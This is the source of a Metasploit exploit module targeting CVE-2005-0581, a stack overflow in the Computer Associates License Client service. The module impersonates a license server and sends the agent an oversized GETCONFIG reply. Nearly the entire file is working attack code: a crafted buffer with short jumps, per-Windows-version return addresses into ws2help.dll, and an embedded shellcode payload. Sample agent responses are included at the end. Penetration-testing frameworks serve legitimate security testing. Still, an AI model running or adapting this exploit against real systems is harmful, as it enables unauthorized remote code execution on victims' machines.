Path: blob/master/modules/exploits/windows/license/calicclnt_getconfig.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Computer Associates License Client GETCONFIG Overflow',15'Description' => %q{16This module exploits a vulnerability in the CA License Client17service. This exploit will only work if your IP address can be18resolved from the target system point of view. This can be19accomplished on a local network by running the 'nmbd' service20that comes with Samba. If you are running this exploit from21Windows and do not filter udp port 137, this should not be a22problem (if the target is on the same network segment). Due to23the bugginess of the software, you are only allowed one connection24to the agent port before it starts ignoring you. If it wasn't for this25issue, it would be possible to repeatedly exploit this bug.26},27'Author' => [28'hdm', # original msf v2 module29'aushack', # msf v3 port :)30],31'License' => MSF_LICENSE,32'References' => [33[ 'CVE', '2005-0581' ],34[ 'OSVDB', '14389' ],35[ 'BID', '12705' ],36[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],37],38'Privileged' => true,39'DefaultOptions' => {40'EXITFUNC' => 'process',41},42'Payload' => {43'Space' => 600,44'BadChars' => "\x00\x20",45'StackAdjustment' => -3500,4647},48'Platform' => 'win',49'Targets' => [50# As much as I would like to return back to the DLL or EXE,51# all of those modules have a leading NULL in the52# loaded @ address :(53# name, jmp esi, writable, jmp edi54# ['Automatic', {} ],55#56# aushack - tested OK Windows XP English SP0-1 only 2010021457['Windows 2000 English', { 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi58['Windows XP English SP0-1', { 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi59['Windows XP English SP2', { 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi60['Windows 2003 English SP0', { 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi61],62'DisclosureDate' => '2005-03-02',63'Notes' => {64'Reliability' => UNKNOWN_RELIABILITY,65'Stability' => UNKNOWN_STABILITY,66'SideEffects' => UNKNOWN_SIDE_EFFECTS67}68)69)7071register_options(72[73Opt::RPORT(10203),74OptPort.new('SRVPORT', [ true, "Fake CA License Server Port", 10202 ]),75]76)77end7879# def check80# It is possible to check, but due to a software bug, checking prevents exploitation81# end8283def exploit84if (connect)85sock.put("A0 GETSERVER<EOM>\n")86print_status("Initial packet sent to remote agent...")87disconnect8889fakecaservice = Rex::Socket::TcpServer.create(90'LocalHost' => '0.0.0.0',91'LocalPort' => datastore['SRVPORT'],92'SSL' => false,93'Context' =>94{95'Msf' => framework,96'MsfExploit' => self,97}98)99100add_socket(fakecaservice)101102fakecaservice.start103print_status("Waiting for the license agent to connect back...")104begin105Timeout.timeout(3) do106done = false107while (not done and session = fakecaservice.accept)108print_status("Accepted connection from agent #{Rex::Socket.source_address(rhost)}..")109session.put("A0 GETCONFIG SELF 0<EOM>")110req = session.recvfrom(2000)[0]111next if not req112next if req.empty?113114if (req =~ /OS\<([^\>]+)/)115print_status("Target reports OS: #{$1}")116end117118# exploits two different versions at once >:-)119# 144 -> return address of esi points to string middle120# 196 -> return address of edi points to string beginning121# 148 -> avoid exception by patching with writable address122# 928 -> seh handler (not useful under XP SP2)123buff = rand_text_alphanumeric(900)124buff[142, 2] = Rex::Arch::X86.jmp_short(8) # jmp over addresses125buff[144, 4] = [target['Rets'][0]].pack('V') # jmp esi126buff[148, 4] = [target['Rets'][1]].pack('V') # writable address127buff[194, 2] = Rex::Arch::X86.jmp_short(4) # jmp over address128buff[196, 4] = [target['Rets'][2]].pack('V') # jmp edi129buff[272, payload.encoded.length] = payload.encoded130131sploit = "A0 GETCONFIG SELF #{buff}<EOM>"132session.put(sploit)133session.close134end135end136ensure137handler138fakecaservice.close139return140end141end142end143end144145=begin146eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>147BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>148lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>149=end150151152